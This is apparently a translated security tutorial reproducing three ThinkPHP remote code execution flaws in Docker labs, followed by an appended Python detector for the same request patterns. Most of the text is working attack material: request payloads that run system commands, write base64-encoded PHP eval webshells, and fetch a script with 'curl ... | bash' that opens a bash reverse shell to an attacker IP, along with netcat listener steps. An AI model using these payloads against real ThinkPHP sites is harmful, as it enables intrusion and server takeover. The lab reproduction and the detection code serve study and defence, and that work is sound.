Introduction to ThinkPHP
ThinkPHP is an open source, lightweight PHP development framework developed in China; it runs on Windows, Unix and Linux server environments.
Many CMS products are built on ThinkPHP, so a vulnerability in ThinkPHP itself affects a large number of websites developed on top of it.
ThinkPHP historical vulnerabilities
Version | Vulnerability type
---|---
ThinkPHP 3.2.3 | Cache function design flaw can lead to Getshell
ThinkPHP 3.2.3 | update method injection vulnerability (latest 3.2.3 release)
ThinkPHP 3.2.X | find/select/delete injection
ThinkPHP 3.X | order_by injection vulnerability
ThinkPHP 5.0.X | SQL injection vulnerability
ThinkPHP 5.0.10 | Cache function design flaw can lead to Getshell
ThinkPHP 5 | SQL injection vulnerability and sensitive information leakage
ThinkPHP 5.X | order_by injection vulnerability
ThinkPHP 5.X | Remote code execution
ThinkPHP 2.x Arbitrary Code Execution Vulnerability
Vulnerability description
The vulnerability exists because ThinkPHP 2.x parses the route path with preg_replace('pattern', 'replacement', 'subject') using the /e (eval) modifier, which evaluates the replacement string as PHP code:
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
The user-supplied path segments are interpolated into the double-quoted replacement string, which is then evaluated as PHP, so an attacker can execute arbitrary code.
Affected version
ThinkPHP 2.x
ThinkPHP 3.0
Vulnerability recurrence
docker-compose up -d
docker ps
Visit the lab environment at http://yourip:8080
Validate the vulnerability with the PoC
http://192.168.88.130:8080/index.php?s=/index/index/xxx/${@phpinfo()}
If phpinfo() is executed successfully, try a webshell next:
http://192.168.88.130:8080/index.php?s=/index/index/xxx/${${@eval($_POST[111])}}
Connect with AntSword
ThinkPHP 5.0.23 Remote Code Execution Vulnerability (CVE-2018-20062)
Vulnerability description
In ThinkPHP 5.0.23, the method used to obtain the request method does not correctly validate the method name, so an attacker can call any method of the Request class and chain those calls into remote code execution.
Affected version
ThinkPHP 5.0.0 ~ 5.0.23
Vulnerability recurrence
docker-compose up -d
docker ps
Visit the lab environment address
To check whether the instance is vulnerable, visit /index.php?s=captcha; a vulnerable instance returns an error page
Send a POST request to execute whoami, id, pwd and other system commands; their output is echoed back in the page
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
Use the echo command to write the webshell; the one-line PHP backdoor needs to be base64-encoded first
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE8P3BocCBAZXZhbCgkX1BPU1RbJ2NtZCddKTs/PmM= | base64 -d > shell.php
Send the POST request, then access the shell.php file
Enter the server container to check whether the file was written successfully
Bash reverse shell
Create a new xx.sh file on the attacking machine and write the bash reverse shell command into it.
bash -i >& /dev/tcp/192.168.88.128/6666 0>&1
# The IP is the attacking machine's IP; the port can be chosen freely
Start an HTTP server on the attacking machine so the target machine can fetch the xx.sh reverse shell file
python3 -m http.server 80
On the attacking machine, listen on port 6666
nc -lvvp 6666
Send the following PoC in a POST request
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=curl 192.168.88.128/thinkphp5.0.23.sh | bash
Check the listener: the reverse shell has connected back successfully
Analysis of the RCE vulnerability caused by ThinkPHP 5.0.x not enabling forced routing (CNVD-2018-24942)
Vulnerability description
The framework does not strictly filter the incoming routing parameters, so an attacker can invoke controller classes that were never meant to be reachable and execute code remotely.
Affected version
ThinkPHP 5.0.5-5.0.22
5.1.0-5.1.30
Vulnerability recurrence
docker-compose up -d
docker ps
Visit the lab environment to confirm it was set up successfully
PoC
index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=-1
Remote command execution PoC
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
Write a webshell
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[ccc]);?>
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo -n <base64-encoded bash reverse shell command> | base64 -d > shell9.php
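As an added defensive example (not part of the original article), the following Python detector flags the three request patterns described on this page (the 2.x `${...}` route payload, the 5.0.23 `_method=__construct&filter[]=` body, and the `\think\app/invokefunction` route) in request records. The sample requests are constructed here from the PoCs above; repeated URL decoding is applied so percent-encoded and double-encoded variants are caught as well.

```python
import re
from urllib.parse import unquote

# Signatures for the three ThinkPHP exploit patterns covered on this page.
# Each regex is matched against the fully URL-decoded request URI plus body.
SIGNATURES = [
    # ThinkPHP 2.x / 3.0: preg_replace /e evaluates "${...}" placed in the route path
    ("tp2x_preg_replace_e", re.compile(r"\$\{[^}]*\w+\s*\(")),
    # ThinkPHP 5.0.x (CVE-2018-20062): Request::__construct override plus filter injection
    ("tp5_method_construct_filter", re.compile(r"_method=__construct.*filter\[\]=", re.I | re.S)),
    # ThinkPHP 5.0.x/5.1.x (CNVD-2018-24942): namespace injected into the s= route parameter
    ("tp5_invokefunction_route", re.compile(r"(^|[?&])s=[^&]*\\think\\app/invokefunction", re.I)),
]

def normalize(text: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads (e.g. %255C) collapse too."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan_request(uri: str, body: str = "") -> list[str]:
    """Return the labels of every signature matching this request (empty list if clean)."""
    haystack = normalize(uri) + "\n" + normalize(body)
    return [label for label, rx in SIGNATURES if rx.search(haystack)]

# Constructed sample traffic (not real logs): (uri, body) pairs, benign ones mixed in.
SAMPLE_REQUESTS = [
    ("/index.php?s=/index/index/name/bob", ""),
    ("/index.php?s=/index/index/xxx/${@phpinfo()}", ""),
    ("/index.php?s=captcha", "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id"),
    ("/index.php?s=index/%5Cthink%5Capp/invokefunction&function=phpinfo&vars[0]=-1", ""),
    ("/index.php?s=captcha", "code=1234"),
]

def scan_all(requests=SAMPLE_REQUESTS) -> list[tuple[str, list[str]]]:
    """Scan every (uri, body) pair and return (uri, hits) for the flagged ones only."""
    return [(uri, hits) for uri, body in requests if (hits := scan_request(uri, body))]

if __name__ == "__main__":
    for uri, hits in scan_all():
        print(f"ALERT {uri} -> {', '.join(hits)}")
```

The same signatures can be fed to a WAF or SIEM rule; the key point is decoding before matching, since the `\` in `\think\app` is usually sent as `%5C`.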